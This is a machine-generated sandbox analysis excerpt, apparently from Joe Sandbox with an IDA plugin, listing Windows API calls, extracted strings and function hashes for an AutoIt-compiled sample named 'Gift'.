                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 4fed4238d7d2d9fe7b2bdf45e958069cc2e7db06962aa26b49cb13ce571dfdba
                                                                          • Instruction ID: 67377b35579a50044f7d16cf43ddbfe96a16736536bf44f535dff867383d56da
                                                                          • Opcode Fuzzy Hash: 4fed4238d7d2d9fe7b2bdf45e958069cc2e7db06962aa26b49cb13ce571dfdba
                                                                          • Instruction Fuzzy Hash: DAA0243001010CF7CF011F41FC054457F5CD700351F00C010F40C00131D773541045C0
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?,00360980), ref: 00353C65
                                                                          • IsWindowVisible.USER32(?), ref: 00353C89
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpperVisibleWindow
                                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                          • API String ID: 4105515805-45149045
                                                                          • Opcode ID: 2b46e650074d5fc3f86671d3da912092279b132bdaa0dabc9409c5a3238bcbde
                                                                          • Instruction ID: 1e12f432171dccd3be9f06e74dcd5829f2e1641fe0fecca12636efac2ea8d2aa
                                                                          • Opcode Fuzzy Hash: 2b46e650074d5fc3f86671d3da912092279b132bdaa0dabc9409c5a3238bcbde
                                                                          • Instruction Fuzzy Hash: 9ED19D302143148BDB16EF10D491E6AB7A5EF88394F204869FD865B2F3CB31EE5ACB51
                                                                          APIs
                                                                          • SetTextColor.GDI32(?,00000000), ref: 0035AC55
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0035AC86
                                                                          • GetSysColor.USER32(0000000F), ref: 0035AC92
                                                                          • SetBkColor.GDI32(?,000000FF), ref: 0035ACAC
                                                                          • SelectObject.GDI32(?,?), ref: 0035ACBB
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0035ACE6
                                                                          • GetSysColor.USER32(00000010), ref: 0035ACEE
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 0035ACF5
                                                                          • FrameRect.USER32(?,?,00000000), ref: 0035AD04
                                                                          • DeleteObject.GDI32(00000000), ref: 0035AD0B
                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0035AD56
                                                                          • FillRect.USER32(?,?,?), ref: 0035AD88
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0035ADB3
                                                                            • Part of subcall function 0035AF18: GetSysColor.USER32(00000012), ref: 0035AF51
                                                                            • Part of subcall function 0035AF18: SetTextColor.GDI32(?,?), ref: 0035AF55
                                                                            • Part of subcall function 0035AF18: GetSysColorBrush.USER32(0000000F), ref: 0035AF6B
                                                                            • Part of subcall function 0035AF18: GetSysColor.USER32(0000000F), ref: 0035AF76
                                                                            • Part of subcall function 0035AF18: GetSysColor.USER32(00000011), ref: 0035AF93
                                                                            • Part of subcall function 0035AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0035AFA1
                                                                            • Part of subcall function 0035AF18: SelectObject.GDI32(?,00000000), ref: 0035AFB2
                                                                            • Part of subcall function 0035AF18: SetBkColor.GDI32(?,00000000), ref: 0035AFBB
                                                                            • Part of subcall function 0035AF18: SelectObject.GDI32(?,?), ref: 0035AFC8
                                                                            • Part of subcall function 0035AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0035AFE7
                                                                            • Part of subcall function 0035AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0035AFFE
                                                                            • Part of subcall function 0035AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0035B013
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                          • String ID:
                                                                          • API String ID: 4124339563-0
                                                                          • Opcode ID: 620c2203b1a089acbdf77f99867d641d652fd039605d2f86639e60d967d906d6
                                                                          • Instruction ID: 8dd903d4700fe114caa06a00d27f476bc72504a69cc0e038050042cebf355bb0
                                                                          • Opcode Fuzzy Hash: 620c2203b1a089acbdf77f99867d641d652fd039605d2f86639e60d967d906d6
                                                                          • Instruction Fuzzy Hash: 07A18D72008701AFD7169F64DC09E6B7BADFF89322F108B19FA62961A0D7B1D844DF52
                                                                          APIs
                                                                          • DestroyWindow.USER32(?,?,?), ref: 002D3072
                                                                          • DeleteObject.GDI32(00000000), ref: 002D30B8
                                                                          • DeleteObject.GDI32(00000000), ref: 002D30C3
                                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 002D30CE
                                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 002D30D9
                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0030C77C
                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0030C7B5
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0030CBDE
                                                                            • Part of subcall function 002D1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002D2412,?,00000000,?,?,?,?,002D1AA7,00000000,?), ref: 002D1F76
                                                                          • SendMessageW.USER32(?,00001053), ref: 0030CC1B
                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0030CC32
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0030CC48
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0030CC53
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                          • String ID: 0
                                                                          • API String ID: 464785882-4108050209
                                                                          Similarity
                                                                          • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                          • API String ID: 2660009612-1645009161
                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000), ref: 00347BC8
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00347C87
                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00347CC5
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00347CD7
                                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00347D1D
                                                                          • GetClientRect.USER32(00000000,?), ref: 00347D29
                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00347D6D
                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00347D7C
                                                                          • GetStockObject.GDI32(00000011), ref: 00347D8C
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00347D90
                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00347DA0
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00347DA9
                                                                          • DeleteDC.GDI32(00000000), ref: 00347DB2
                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00347DDE
                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00347DF5
                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00347E30
                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00347E44
                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00347E55
                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00347E85
                                                                          • GetStockObject.GDI32(00000011), ref: 00347E90
                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00347E9B
                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00347EA5
                                                                          Similarity
                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                          • API String ID: 2910397461-517079104
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0033B361
                                                                          • GetDriveTypeW.KERNEL32(?,00362C4C,?,\\.\,00360980), ref: 0033B43E
                                                                          • SetErrorMode.KERNEL32(00000000,00362C4C,?,\\.\,00360980), ref: 0033B59C
                                                                          Similarity
                                                                          • API ID: ErrorMode$DriveType
                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                          • API String ID: 2907320926-4222207086
                                                                          APIs
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0035A0F7
                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0035A1B0
                                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 0035A1CC
                                                                          Similarity
                                                                          • API ID: MessageSend$Window
                                                                          • String ID: 0
                                                                          • API String ID: 2326795674-4108050209
                                                                          APIs
                                                                          • GetSysColor.USER32(00000012), ref: 0035AF51
                                                                          • SetTextColor.GDI32(?,?), ref: 0035AF55
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0035AF6B
                                                                          • GetSysColor.USER32(0000000F), ref: 0035AF76
                                                                          • CreateSolidBrush.GDI32(?), ref: 0035AF7B
                                                                          • GetSysColor.USER32(00000011), ref: 0035AF93
                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0035AFA1
                                                                          • SelectObject.GDI32(?,00000000), ref: 0035AFB2
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0035AFBB
                                                                          • SelectObject.GDI32(?,?), ref: 0035AFC8
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0035AFE7
                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0035AFFE
                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0035B013
                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0035B05F
                                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0035B086
                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0035B0A4
                                                                          • DrawFocusRect.USER32(?,?), ref: 0035B0AF
                                                                          • GetSysColor.USER32(00000011), ref: 0035B0BD
                                                                          • SetTextColor.GDI32(?,00000000), ref: 0035B0C5
                                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0035B0D9
                                                                          • SelectObject.GDI32(?,0035AC1F), ref: 0035B0F0
                                                                          • DeleteObject.GDI32(?), ref: 0035B0FB
                                                                          • SelectObject.GDI32(?,?), ref: 0035B101
                                                                          • DeleteObject.GDI32(?), ref: 0035B106
                                                                          • SetTextColor.GDI32(?,?), ref: 0035B10C
                                                                          • SetBkColor.GDI32(?,?), ref: 0035B116
                                                                          Similarity
                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                          • String ID:
                                                                          • API String ID: 1996641542-0
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003590EA
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003590FB
                                                                          • CharNextW.USER32(0000014E), ref: 0035912A
                                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0035916B
                                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00359181
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00359192
                                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003591AF
                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 003591FB
                                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00359211
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00359242
                                                                          • _memset.LIBCMT ref: 00359267
                                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003592B0
                                                                          • _memset.LIBCMT ref: 0035930F
                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00359339
                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00359391
                                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 0035943E
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00359460
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003594AA
                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003594D7
                                                                          • DrawMenuBar.USER32(?), ref: 003594E6
                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 0035950E
                                                                          Similarity
                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                          • String ID: 0
                                                                          • API String ID: 1073566785-4108050209
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 00355007
                                                                          • GetDesktopWindow.USER32 ref: 0035501C
                                                                          • GetWindowRect.USER32(00000000), ref: 00355023
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00355085
                                                                          • DestroyWindow.USER32(?), ref: 003550B1
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003550DA
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003550F8
                                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0035511E
                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00355133
                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00355146
                                                                          • IsWindowVisible.USER32(?), ref: 00355166
                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00355181
                                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00355195
                                                                          • GetWindowRect.USER32(?,?), ref: 003551AD
                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 003551D3
                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 003551ED
                                                                          • CopyRect.USER32(?,?), ref: 00355204
                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 0035526F
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                          • String ID: ($0$tooltips_class32
                                                                          • API String ID: 698492251-4156429822
                                                                          • Opcode ID: a132c58ad9a15debbb5900b9bd820f6610097ac86a2788bfa84202e6b31557d8
                                                                          • Instruction ID: 32df4fe3aff5522ba4f80995ef4ced8f5cfb296b3db0f1489c70072ba9a6fede
                                                                          • Opcode Fuzzy Hash: a132c58ad9a15debbb5900b9bd820f6610097ac86a2788bfa84202e6b31557d8
                                                                          • Instruction Fuzzy Hash: 01B18970614740AFDB05DF64C855F6ABBE4FF88311F008919F9999B2A1D7B0EC09CB92
                                                                          APIs
                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0033499C
                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003349C2
                                                                          • _wcscpy.LIBCMT ref: 003349F0
                                                                          • _wcscmp.LIBCMT ref: 003349FB
                                                                          • _wcscat.LIBCMT ref: 00334A11
                                                                          • _wcsstr.LIBCMT ref: 00334A1C
                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00334A38
                                                                          • _wcscat.LIBCMT ref: 00334A81
                                                                          • _wcscat.LIBCMT ref: 00334A88
                                                                          • _wcsncpy.LIBCMT ref: 00334AB3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                          • API String ID: 699586101-1459072770
                                                                          • Opcode ID: b4984b6a2971067dccb4677905c55f36acf2c17d62dc1228e4c6ea14ab716695
                                                                          • Instruction ID: 2ed36514bd49d181b38d8d844e0b9633838dc969c3e8424dc4cbd77aca36a8f1
                                                                          • Opcode Fuzzy Hash: b4984b6a2971067dccb4677905c55f36acf2c17d62dc1228e4c6ea14ab716695
                                                                          • Instruction Fuzzy Hash: 06414872610209BBDB16B7708C43EBFF77CDF41390F104069FA05A6192EB70EA219AA5
                                                                          APIs
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002D2C8C
                                                                          • GetSystemMetrics.USER32(00000007), ref: 002D2C94
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002D2CBF
                                                                          • GetSystemMetrics.USER32(00000008), ref: 002D2CC7
                                                                          • GetSystemMetrics.USER32(00000004), ref: 002D2CEC
                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002D2D09
                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 002D2D19
                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002D2D4C
                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002D2D60
                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 002D2D7E
                                                                          • GetStockObject.GDI32(00000011), ref: 002D2D9A
                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 002D2DA5
                                                                            • Part of subcall function 002D2714: GetCursorPos.USER32(?), ref: 002D2727
                                                                            • Part of subcall function 002D2714: ScreenToClient.USER32(003977B0,?), ref: 002D2744
                                                                            • Part of subcall function 002D2714: GetAsyncKeyState.USER32(00000001), ref: 002D2769
                                                                            • Part of subcall function 002D2714: GetAsyncKeyState.USER32(00000002), ref: 002D2777
                                                                          • SetTimer.USER32(00000000,00000000,00000028,002D13C7), ref: 002D2DCC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                          • String ID: AutoIt v3 GUI$h6
                                                                          • API String ID: 1458621304-2448167998
                                                                          • Opcode ID: 15f839396f5e430d5630e289187deaf98ea776fb5a40e879146ad19db28332e4
                                                                          • Instruction ID: b7ac87566685d0384092308af1038b39ceefd04c1e26ca5c942a96c7adf55f45
                                                                          • Opcode Fuzzy Hash: 15f839396f5e430d5630e289187deaf98ea776fb5a40e879146ad19db28332e4
                                                                          • Instruction Fuzzy Hash: BAB1507162420ADFDB16DFA8CD56BAE77A8FB18310F118216FA15972D0DBB0AC50CF50
                                                                          APIs
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          • GetForegroundWindow.USER32(00360980,?,?,?,?,?), ref: 002F04E3
                                                                          • IsWindow.USER32(?), ref: 003266BB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Foreground_memmove
                                                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                          • API String ID: 3828923867-1919597938
                                                                          • Opcode ID: b3816e02694d571501d90adfe3b5ae962fa92c1aa07bef456c36579cb214f14a
                                                                          • Instruction ID: 220eb33188f91193f4a85e7d8428df68b4c9c7e769dab70fa7993d82e8c2eba3
                                                                          • Opcode Fuzzy Hash: b3816e02694d571501d90adfe3b5ae962fa92c1aa07bef456c36579cb214f14a
                                                                          • Instruction Fuzzy Hash: 0FD10330114756DBDB06EF20D4829AAFBB4FF44344F604A29F595435A2DB30E969CF92
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?), ref: 003544AC
                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0035456C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharMessageSendUpper
                                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                          • API String ID: 3974292440-719923060
                                                                          • Opcode ID: 4a8ed7181b248ac1287fc95df92a9fedd3974fd3b9e80de3e67b90f5685afd04
                                                                          • Instruction ID: 4fe734dc416470e77645dcd7e218226186a7f8fc1b52192ef505e3efc9973e8b
                                                                          • Opcode Fuzzy Hash: 4a8ed7181b248ac1287fc95df92a9fedd3974fd3b9e80de3e67b90f5685afd04
                                                                          • Instruction Fuzzy Hash: 83A191302243119FDB19EF20C851E7AB3A5FF89319F108969F8565B7A2DB30EC59CB51
                                                                          APIs
                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 003456E1
                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 003456EC
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 003456F7
                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00345702
                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0034570D
                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00345718
                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00345723
                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 0034572E
                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00345739
                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00345744
                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 0034574F
                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 0034575A
                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00345765
                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00345770
                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0034577B
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00345786
                                                                          • GetCursorInfo.USER32(?), ref: 00345796
                                                                          • GetLastError.KERNEL32(00000001,00000000), ref: 003457C1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                          • String ID:
                                                                          • API String ID: 3215588206-0
                                                                          • Opcode ID: b9a12d037379bfee4c998ff39e36f251b0ae4fc17d3ad02f463a4a039c2f69a2
                                                                          • Instruction ID: 7b06eabf5476218eca4223aa05f64cdf3f55d32fa3430463b89f07baab2d8436
                                                                          • Opcode Fuzzy Hash: b9a12d037379bfee4c998ff39e36f251b0ae4fc17d3ad02f463a4a039c2f69a2
                                                                          • Instruction Fuzzy Hash: 35417370E44319ABDB119FBA8C49D6FFEF8EF41B10B10452FE109EB291DAB8A500CE51
                                                                          APIs
